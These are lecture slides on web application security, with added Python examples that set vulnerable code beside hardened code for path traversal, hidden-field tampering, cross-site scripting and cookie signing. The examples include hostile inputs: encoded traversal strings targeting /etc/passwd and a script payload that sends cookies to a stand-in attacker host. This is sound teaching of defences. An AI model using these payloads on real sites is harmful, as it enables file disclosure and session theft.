Web-applications security


Security of Web Applications
Jamshid Shokrollahi
E-Commerce Security
Overview
• Why Web application security?
• Some attacks on web applications and corresponding countermeasures
Why Web application security?
• Reduce cost of recovery and fixes
• Ensure customer trust
• Encourage website adoption
• Maintain competitive advantages
• Manage legal risks
Some attacks on Web Applications
• Known vulnerabilities and misconfigurations
• Hidden fields
• Backdoor and debug options
• Cross-site scripting
• Cookie poisoning
• Buffer overflow
Known vulnerabilities and misconfigurations
Security Bulletin MS00-078:
"… in IIS 4.0 and 5.0, a particular type of malformed URL … enables a malicious user ... to add, change or delete data, run code already on the server, or upload new code to the server and run it. …"
• October 2000: Microsoft's IIS (the "Web Server Folder Traversal" vulnerability)
• A malformed URL lets the malicious user navigate outside the web root, anywhere on the logical drive of the web server.
• The attacker's commands run under the security context of IUSR_machinename, the anonymous account used by IIS, which is a member of the Everyone and Guests groups.
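MS00-078 hinged on a filter applied before decoding: IIS looked for "../" in the raw request, but an overlong UTF-8 encoding of the slash (%c0%af) slipped past and was only turned into a path separator afterwards. The example below is added here to show the general defence (decode fully and strictly, canonicalise, then check containment in the document root) next to the check-then-decode pattern that fails. It is illustrative code, not IIS's or the slide author's; the lenient decoder is a simulation of a tolerant UTF-8 decoder, and WEBROOT and the /etc/passwd target are constructed.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed document root for the example; a real server reads it from config.
WEBROOT = "/srv/www"


def lenient_decode(raw: str) -> str:
    """Percent-decode, then decode bytes *leniently*: a two-byte sequence whose
    lead byte is 0xC0 or 0xC1 is an overlong UTF-8 form and is mapped to the
    ASCII character it spells (so %c0%af becomes '/'). This simulates the kind
    of tolerant decoder that turns an already-filtered path into a traversal;
    it is an illustration, not IIS's code."""
    data = unquote_to_bytes(raw)
    out = []
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(lead))  # every other byte is taken as a single character
            i += 1
    return "".join(out)


def vulnerable_resolve(url_path: str) -> Optional[str]:
    """Check-then-decode: filters '../' in the raw URL, then maps it to a file."""
    if "../" in url_path or "..\\" in url_path:
        return None
    decoded = lenient_decode(url_path)
    return posixpath.normpath(posixpath.join(WEBROOT, decoded.lstrip("/")))


def safe_resolve(url_path: str) -> Optional[str]:
    """Decode-then-check: decode fully and strictly, canonicalise, then verify
    the result still lies inside WEBROOT."""
    try:
        decoded = unquote_to_bytes(url_path).decode("utf-8")  # strict: overlong forms fail
    except UnicodeDecodeError:
        return None
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")
    full = posixpath.normpath(posixpath.join(WEBROOT, decoded.lstrip("/")))
    if full != WEBROOT and not full.startswith(WEBROOT + "/"):
        return None
    return full


if __name__ == "__main__":
    for p in ["/images/logo.png", "/../../etc/passwd",
              "/..%2f..%2fetc/passwd", "/..%c0%af..%c0%afetc/passwd"]:
        print(f"{p:32} vulnerable={vulnerable_resolve(p)!s:18} safe={safe_resolve(p)}")
```

The containment test compares the canonicalised absolute path against the root rather than searching the request for ".." again, so it does not matter which encoding trick produced the separator; anything that decodes to a path outside WEBROOT is refused.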
Tampering Hidden fields
• Hidden fields in forms could contain passwords or prices which must be submitted back to the server.
• They can be viewed or modified by clients and submitted back.
Tampering Hidden fields
[Figure: the Web server sends the Web user a form to be filled in, containing unit prices as hidden fields; the user returns a wrong order in which the unit prices (hidden fields) have been reduced, and the order is passed on to the Database server. Notes on the figure: the forms should be validated; passwords should not be sent to the clients.]
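The figure's countermeasure, "the forms should be validated", means in practice that the server never reads a price back from the client at all. The example below is added here (not code from the slides): a checkout that trusts the hidden unit_price field next to one that re-derives the price from a server-side catalogue and validates the only value the client may choose. The CATALOG, SKUs and the tampered form are constructed.

```python
from decimal import Decimal
from typing import Dict, Optional

# Constructed catalogue: the server's authoritative prices.
CATALOG = {
    "SKU-100": Decimal("19.99"),
    "SKU-200": Decimal("249.00"),
}


def vulnerable_total(form: Dict[str, str]) -> Decimal:
    """Trusts the unit price echoed back from the form's hidden field."""
    return Decimal(form["unit_price"]) * int(form["qty"])


def hardened_total(form: Dict[str, str]) -> Optional[Decimal]:
    """Ignores whatever price the client sent: re-reads it from the catalogue
    and validates the one input the client is allowed to choose."""
    sku = form.get("sku", "")
    if sku not in CATALOG:
        return None
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        return None
    if not 1 <= qty <= 100:  # sanity bound; negative or absurd quantities are rejected
        return None
    return CATALOG[sku] * qty


# Constructed tampered submission: the hidden unit_price was edited before submit.
TAMPERED_FORM = {"sku": "SKU-200", "qty": "2", "unit_price": "0.01"}

if __name__ == "__main__":
    print("trusting the hidden field:", vulnerable_total(TAMPERED_FORM))
    print("catalogue lookup:        ", hardened_total(TAMPERED_FORM))
```

The same rule covers the password case in the figure: data the client must not see or alter is kept on the server and referenced by an opaque identifier, not round-tripped through a hidden field.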
Backdoor and debug options
• Backdoor options are built into applications during debugging.
• Programmers build shortcuts to avoid logging in for every round of debugging.
• Because of time limits, debugging versions are put on the web; such shortcuts must be removed before the code is deployed.
Threats caused by scripts
• CERT Advisory CA-1997-20
  Impact: enables monitoring of the user's web activities
  Cause: vulnerabilities in browsers (JavaScript)
  Solution: upgrade the browser or disable JavaScript
• CERT Vulnerability Note VU#800893
  Impact: disclosure of files
  Cause: vulnerability in the implementation of GetObject in IE (VBScript)
  Solution: download the patch or disable active scripting in IE, especially when visiting untrusted sites.
Cross-site scripting
• Does not depend on an unpatched browser: the script is injected through the web application, not through a browser bug
• Put malicious code on innocent webpages
• Submit text including:
<SCRIPT>malicious code</SCRIPT>
Other users' browsers download the code and run it in the context of the innocent site
• Abuse of the <FORM> tag
• Internet Explorer security "zones" can be subverted by this technique
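The server-side countermeasure is to encode untrusted text for the HTML context it is placed in, so a submitted <SCRIPT> tag is displayed as text instead of being parsed as markup. The example below is added here and is not the slide author's code: a guestbook renderer that concatenates input into markup next to one that escapes element text and a quoted attribute separately, plus a tag counter that makes the injection visible. The page template, the attacker inputs and the host attacker.example are constructed.

```python
import html
import re

# Page template: untrusted data is dropped into {body}.
PAGE = "<html><body><h1>Guestbook</h1>{body}</body></html>"


def render_vulnerable(author: str, comment: str) -> str:
    """Concatenates user input straight into markup: a submitted <SCRIPT> tag is
    parsed as a script, and a quote in 'author' breaks out of the attribute."""
    return PAGE.format(body=f'<p title="{author}">{comment}</p>')


def render_hardened(author: str, comment: str) -> str:
    """Escapes each value for the context it lands in: element text and a
    double-quoted attribute. The text is still shown, but as text."""
    safe_author = html.escape(author, quote=True)     # also escapes " and '
    safe_comment = html.escape(comment, quote=False)  # <, >, & suffice in a text node
    return PAGE.format(body=f'<p title="{safe_author}">{safe_comment}</p>')


_TAG = re.compile(r"</?[A-Za-z]")


def tag_count(page: str) -> int:
    """Counts tag starts; more tags than the template emits means injected markup."""
    return len(_TAG.findall(page))


# Constructed attacker inputs (attacker.example is a placeholder host).
EVIL_COMMENT = "<SCRIPT>location='http://attacker.example/?c='+document.cookie</SCRIPT>"
EVIL_AUTHOR = '" onmouseover="alert(1)'

if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        page = render(EVIL_AUTHOR, EVIL_COMMENT)
        print(render.__name__, tag_count(page), "tags")
        print(page)
```

Escaping is context-specific: html.escape with quote=False is enough between tags, but inside an attribute the quote characters must be encoded too, or the author string above closes the title attribute and adds an event handler.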
Cookie-based attacks
• Like the hidden field attack, when parameters are saved in cookies (cookie poisoning).
• Packet sniffing to steal identities (session identifiers) which are saved in cookies.
• Countermeasure: digital signatures and cryptography, so that a modified cookie is rejected by the server.
• Using cross-site scripting (abbreviated CSS in the paper cited below) to send cookies to other servers; here even cryptography does not help, because the attacker replays an authentic, correctly signed cookie rather than modifying it.
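To make the two countermeasure points concrete, the example below is added here (not code from the slides): an HMAC-SHA256 tag appended to a cookie value lets the server detect a poisoned cookie, and the same verifier also shows the limit the slide names, since a stolen cookie replayed unchanged still verifies. The key, cookie contents and the "poisoned" edit are constructed.

```python
import base64
import hashlib
import hmac
from typing import Optional

# Constructed server-side key; it never leaves the server.
SECRET_KEY = b"example-32-byte-server-secret-key!!"


def sign_cookie(value: str, key: bytes = SECRET_KEY) -> str:
    """Appends an HMAC-SHA256 tag so the server can detect modification."""
    tag = hmac.new(key, value.encode("utf-8"), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(tag).decode("ascii").rstrip("=")


def verify_cookie(cookie: str, key: bytes = SECRET_KEY) -> Optional[str]:
    """Returns the cookie's value if its tag checks out, else None.
    Recomputes the tag over the value and compares in constant time."""
    if not cookie.isascii():
        return None
    value, sep, _tag = cookie.rpartition(".")  # value itself may contain dots
    if not sep:
        return None
    if not hmac.compare_digest(sign_cookie(value, key), cookie):
        return None
    return value


# Constructed cookies: the original set by the server, and a poisoned copy.
ORIGINAL = sign_cookie("user=alice;role=customer")
POISONED = ORIGINAL.replace("role=customer", "role=admin")

if __name__ == "__main__":
    print("original :", verify_cookie(ORIGINAL))
    print("poisoned :", verify_cookie(POISONED))
    # Replay: a copy stolen by script or by sniffing verifies just the same.
    print("replayed :", verify_cookie(ORIGINAL))
```

The signature binds the value to the server's key, so editing role=customer to role=admin invalidates it; it does not bind the cookie to the client, which is why a cookie exfiltrated by cross-site scripting is still accepted when the attacker presents it.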
Buffer overflow
• A kind of denial of service attack: the overflowed process crashes
• Malicious users can sometimes run their own program
• By overwriting the saved return address on the stack with the address of their code
Bibliography
• Gunter Ollmann, HTML Code Injection and Cross-site Scripting, http://www.technicalinfo.net/papers/CSS.html
• CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests, http://www.cert.org/advisories/CA-2000-02.html
• Wikipedia